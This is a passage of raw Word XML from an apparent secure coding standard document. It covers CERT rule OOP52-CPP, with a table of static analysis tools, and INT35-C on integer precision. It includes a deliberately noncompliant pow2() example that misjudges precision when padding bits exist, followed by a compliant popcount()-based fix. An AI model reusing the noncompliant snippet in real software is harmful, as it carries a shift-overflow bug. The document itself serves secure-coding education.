            <w:r w:rsidR="007E1C77" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Adopt a Secure Coding Standard</w:t>
            </w:r>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Using the coding standards will help avoid errors like, not calling a virtual destructor when dealing with polymorphic types.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F21822" w14:paraId="58D4006C" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="220323A9" w14:textId="6096B001" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D7BD83E" w14:textId="47D65578" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4323B829" w14:textId="194602FF" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C5CDDA0" w14:textId="13C5DB4B" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AF3013" w14:textId="7E6BAEE9" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">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21822" w14:paraId="763D0227" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BEC1ECA" w14:textId="1A41BF39" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId48" w:history="1">
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4608270D" w14:textId="77777777" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C6600F4" w14:textId="41CEF2EB" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303F54C0" w14:textId="1D7C97B8" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>303 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08A327DD" w14:textId="3EF33262" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="50569B33" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D888D34" w14:textId="50F7ABBB" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId49" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A9DC142" w14:textId="0CA64E86" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="310BD1C0" w14:textId="3E94F685" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>CERT_CPP-OOP52-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D7A853F" w14:textId="7858D40E" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Define a virtual destructor in classes used as base classes which have virtual functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="6F86E3DA" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258CE126" w14:textId="6C61280F" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId50" w:history="1">
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>PRQA QA-C++</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28A63EAE" w14:textId="595F4E04" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CBF64D1" w14:textId="2D08FF49" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>3402, 3403, 3404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258B63F8" w14:textId="4D365143" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="669BE97C" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E01C55" w14:textId="7ECC391B" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId51" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44AB9F5A" w14:textId="53A81F82" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>R2020a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="070D1B90" w14:textId="32AE4612" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId52" w:history="1">
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>CERT C++: OOP52-CPP</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CE70AF4" w14:textId="6C5FB4AB" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Checks for situations when a class has virtual functions but not a virtual destructor (rule partially covered)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E7992E2" w:rsidR="00B475A1" w:rsidRDefault="00B64D61" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Use correct integer precisions</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E717068" w:rsidR="00B475A1" w:rsidRDefault="00B64D61" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Integer Precision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="519E82BC" w14:textId="701C677C" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00B64D61">
              <w:t>INT</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00B64D61">
              <w:t>035</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00B64D61">
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="490A5770" w14:textId="0ED2B477" w:rsidR="00B475A1" w:rsidRDefault="00B64D61" w:rsidP="00F51FA8">
            <w:r>
              <w:t>An integer’s size is contributed by the padding bits, but this does not inherently carry over to the precision. This can lead to incorrect assumptions about the numeric range of these types.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21B4F3C" w:rsidR="00F72634" w:rsidRDefault="00B64D61" w:rsidP="0015146B">
            <w:r>
              <w:t>If this code runs on a platform where unsigned int has one or more padding bits, it can result in a value for exp that are too large.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="25A0CD90" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4E0A569F"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#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>limits.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA9F723"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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C7AF0B3"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unsigned int pow2(unsigned int exp) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1370EDF4"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if (exp &gt;= </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(unsigned int) * CHAR_BIT) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E6564E8"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 Handle error */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42DD0C1F"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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3526D435"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return 1 &lt;&lt; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>exp;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5E1D505C" w14:textId="2DA7D204" w:rsidR="00F72634" w:rsidRDefault="00B64D61" w:rsidP="00B64D61">
            <w:r w:rsidRPr="00B64D6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E901F55" w:rsidR="00F72634" w:rsidRDefault="00B64D61" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">Using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>popcount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>() function allows the code to determine the precision of any integer type, signed or unsigned. This function will do this by counting the number of bits set on any unsigned integer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="4E6EA6E9" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="005F5FE5"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#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>stddef.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65EE7B01"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#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>stdint.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08F1C107"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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D86D813"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Returns the number of set bits */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="791C2305" w14:textId="77777777" w:rsidR="00B64D61" w:rsidRPr="00B64D61" w:rsidRDefault="00B64D61" w:rsidP="00B64D61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>popcount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>uintmax_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> num) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47787A04"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t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> precision = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="73EDC763"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while (num != 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04071C4D"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if (num % 2 == 1) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD568DA"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precision+</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>+;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5924337C"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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD7F00A"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num &gt;&gt;= </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6320A139"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75D5EFA1"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 xml:space="preserve">  return </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>precision;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2B56F138" w14:textId="77777777" w:rsidR="00B64D61" w:rsidRPr="00B64D61" w:rsidRDefault="00B64D61" w:rsidP="00B64D61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="316D7001" w14:textId="4170C364" w:rsidR="00F72634" w:rsidRDefault="00B64D61" w:rsidP="00B64D61">
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#define PRECISION(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>umax_value</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>popcount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B64D61">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>umax_value</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B64D6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794BB7CA" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007E1C77" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Validate</w:t>
            </w:r>
            <w:r w:rsidR="007E1C77" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007E1C77" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Input Data</w:t>
            </w:r>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
